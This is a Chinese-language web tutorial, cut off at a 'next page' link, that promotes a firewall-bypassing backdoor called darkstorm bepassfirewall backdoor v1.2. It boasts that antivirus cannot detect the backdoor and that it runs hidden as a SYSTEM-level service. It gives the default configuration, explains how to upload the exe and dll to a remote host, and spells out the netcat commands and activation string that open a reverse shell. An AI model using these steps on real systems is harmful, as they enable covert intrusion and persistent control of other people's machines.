+设为首页 +添加到收藏夹
今天要为大家介绍的darkstorm bepassfirewall backdoor v1.2是一款成功率极高的反弹端口穿透防火墙的后门程序(以下简称dbb),可以穿透99%的防火墙.该后门采用线程插入技术,隐蔽性极高,在系统中以服务形式加载,拥有system权限,一旦运行,很难将其删除.同时,最重要的是,现在还没有杀毒软件能够查杀它,可以说是现在理想的后门程序了.下面就让我们一起来领略一下dbb的独到魅力吧!
一.配置后门
560)this.style.width=560; onmousewheel = javascript:return big(this) src="/files/uploadimg/20060208/1716340.jpg"> 【程序编程相关:Aisino服务器双机热备份解决方案】
第一步当然是把三.轻松操纵当回家,在使用后门前,请先用压缩包内的config darkstorm.exe程序配置后门.双击运行config darkstorm.exe,打开如图1所示的配置对话窗口,根据提示输入相关数据.其实,该后门支持不经过配置就可直接使用,这时将使用后门的默认配置:反向连接端口是8888,关键字是noir,服务名是dnscnsvc. 【推荐阅读:北京工业大学IP SAN存储系统】
小提示:dbb后门服务端由darkstorm.exe与darkstorm.dll组成,这两个exe与dll文件是可以改名的,但是必须要改成同样的名字,比如,可以把exe文件改名为123.exe,那么dll文件也要相应的改名为123.dll. 【扩展信息:视频点播系统存储解决方案】
二.打开后门
要运行后门很简单,只要将exe与dll文件上传到远程主机上之后,直接运行exe文件,后门即可被加载.
小提示:exe文件与dll文件不必一定要放到system32中,但必须在同一文件夹下.
大家都知道,现在很多情况下主机是在防火墙后面的,如何让后门来逃避防火墙的火眼金睛呢?这就需要用反向连接功能.dbb是通过嗅探激活字符来启动反向连接的,仅支持nc反向连接.
首先在本地计算机中使用nc监听本地计算机的8888端口,进入命令行状态,运行如下命令: nc -l -p 8888.然后再用nc连接目标主机的任何一个防火墙允许的tcp端口(80/139/445.....),接着再开一个命令行窗口,运行命令:nc 220.202.242.101 139,然后输入激活命令:noir:220.202.242.98:8888.... 下一页